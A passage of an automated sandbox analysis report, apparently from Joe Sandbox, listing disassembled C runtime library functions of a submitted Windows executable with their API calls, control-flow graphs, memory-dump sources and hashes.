                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B216270B002459FDB01DF65C985FAEBBF5AF48310F5480ADE505AB2A2DB71AD46CB14
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D5547 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 382 3d5547-3d556f 383 3d5575-3d5577 382->383 384 3d5571-3d5573 382->384 386 3d557d-3d5584 call 3d547c 383->386 387 3d5579-3d557b 383->387 385 3d55c6-3d55c9 384->385 389 3d5589-3d558d 386->389 387->385 390 3d55ac-3d55c3 389->390 391 3d558f-3d559d GetProcAddress 389->391 392 3d55c5 390->392 391->390 393 3d559f-3d55aa call 3d0054 391->393 392->385 393->392
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: c7b892528dab32edd3aae379f389e61846c793e17b2eb5af4ab7d2b0451d5669
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2f008387d41089a29108b33bb33729f4d2ace858a8d730de21a8e5d8df502894
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7b892528dab32edd3aae379f389e61846c793e17b2eb5af4ab7d2b0451d5669
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 370128337006116F9B278E6EFC80A5B339BBB863607194222F912DF298DA30DD05CB81
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C2323 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 396 3c2323-3c237a call 3c2a6a call 3c1134 call 3c278c 402 3c237f-3c2398 call 3c5cbb 396->402
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _swprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 589789837-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4a3f94077df30133bd80dfada03373c4a7804388a9b7fe192ee4a40b1ac82c07
                                                                                                                                                                                                                                                                                                  • Instruction ID: a9150d56caa00d9b73ef7c1cdf97819ef576ba5f4af77f2f8018a5e1460cba4b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a3f94077df30133bd80dfada03373c4a7804388a9b7fe192ee4a40b1ac82c07
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE018F73500208AFDB12AF54CC82EABB7ADEB48314F00461AFA5596151EA31EE2597E2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                  Function 003DCF9B Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2508670823c105d07b006d9c002df0af02d5219edec9290011ef828bbc44c925
                                                                                                                                                                                                                                                                                                  • Instruction ID: d448800be324906d99e1dc69a769abec976bbde52aefed3738c46914959e9743
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2508670823c105d07b006d9c002df0af02d5219edec9290011ef828bbc44c925
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36D22972E082288FDB66DE28ED407EAB7B9EB44305F1545EAD40DE7240DB74AE85CF41
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DC414 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,003DC732,00000002,00000000,?,?,?,003DC732,?,00000000), ref: 003DC4AD
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,003DC732,00000002,00000000,?,?,?,003DC732,?,00000000), ref: 003DC4D6
                                                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,003DC732,?,00000000), ref: 003DC4EB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                                  • Opcode ID: ca64fe28f1a41623b1e01b82e5fc386ca70ba3c84502ad03b00c94f6d37c4d3d
                                                                                                                                                                                                                                                                                                  • Instruction ID: a09f3b70893e66f72e97c17778741f86316b55c399519370a8342dfcb805728a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca64fe28f1a41623b1e01b82e5fc386ca70ba3c84502ad03b00c94f6d37c4d3d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6021C423A30112A6DB338F56E960AB7B3BAAF54F50B579526F909DB301EB32DD40D350
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DC5E9 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 003DC6F5
                                                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 003DC73E
                                                                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 003DC74D
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 003DC795
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 003DC7B4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 415426439-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 57891c225e7cb091f6f7ea8fa3ec6d2715b5edf34874908252987a573308c30e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 16c845f377a6d15ef1dafabe607fc38e4280d84ea057dd227f2abfaff21e02e5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57891c225e7cb091f6f7ea8fa3ec6d2715b5edf34874908252987a573308c30e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C05162739202069FDB22DFA5EC41ABA77B8FF08700F19556AE514EB290EB70DD04CB61
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003CF680 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 449COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: G=$G=
                                                                                                                                                                                                                                                                                                  • API String ID: 0-2121552906
                                                                                                                                                                                                                                                                                                  • Opcode ID: 84c6b3c7577c3d8be5159056f1df0cc0a083e065d44da9bff4d557b3e001d670
                                                                                                                                                                                                                                                                                                  • Instruction ID: ccf49caa7656de497895f0ba48d7006a030e5087d5620a81466abe38f4470df7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84c6b3c7577c3d8be5159056f1df0cc0a083e065d44da9bff4d557b3e001d670
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70F10B75E002199FDF15CF69D880BADB7B2EF48314F26826DE819EB394D7309D458B90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DBC85 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,003D1286,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 003DBD46
                                                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,003D1286,?,?,?,00000055,?,-00000050,?,?), ref: 003DBD71
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 003DBED4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                                                                                  • API String ID: 607553120-905460609
                                                                                                                                                                                                                                                                                                  • Opcode ID: c1374ea0395b97b4f4511c212d2d44c3cc1e902744947c41957fcbbe67b27482
                                                                                                                                                                                                                                                                                                  • Instruction ID: c3f47458bc347ab8741a9ec362e02dfcc53d93198a26c5af8ed68b305a9e7bdc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1374ea0395b97b4f4511c212d2d44c3cc1e902744947c41957fcbbe67b27482
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2771B473600205EADB27AB75FC46BB6B3A9EF44740F16442BF6059B791EB70E9408760
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D3092 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8dad789afd6d51dda9cbc5801a1597c603c4f5d55282779db2e220a882f4d380
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8f2f52c2540faa809a0ccb48f881e5cc729e840a90b591bd61e43a9c14509ab6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dad789afd6d51dda9cbc5801a1597c603c4f5d55282779db2e220a882f4d380
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FB15733E042569FDB138F68D881BEEBBA5EF55310F15816BE805AB341D6349E05C7A2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C67DF Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 003C67EB
                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 003C68B7
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003C68D0
                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 003C68DA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a5ab95bb3da8d57216e6ef656062f0c2cfcfdea56ae5c6387469feb7c78d0cee
                                                                                                                                                                                                                                                                                                  • Instruction ID: d40088d73a622992eff91aa625d5240901755783a4342aaa41903987bf30033b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5ab95bb3da8d57216e6ef656062f0c2cfcfdea56ae5c6387469feb7c78d0cee
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5831E775D053189ADF21DF64DD89BCDBBB8AF08300F1041AAE50DAB250EB759E84CF45
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040BE77 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 761COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __invoke_watson.LIBCMT ref: 0040BF4F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00408678: __call_reportfault.LIBCMT ref: 00408685
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __call_reportfault__invoke_watson
                                                                                                                                                                                                                                                                                                  • String ID: T$B
                                                                                                                                                                                                                                                                                                  • API String ID: 3340580077-3406809993
                                                                                                                                                                                                                                                                                                  • Opcode ID: c94bcd397c9e06d90eaeb960da0b91b44b0e1697e56719fad3e4023e60281751
                                                                                                                                                                                                                                                                                                  • Instruction ID: feb3cf79afe3c8fe31b86ab358e8f463df24382393a3db41d078f5c55ec2d306
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c94bcd397c9e06d90eaeb960da0b91b44b0e1697e56719fad3e4023e60281751
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD525C71D1025ACBDF24CFA8C8912AEB7B1FF54304F54827AD806BB381D7789946CB99
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DC098 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003DC0EC
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003DC136
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003DC1FC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
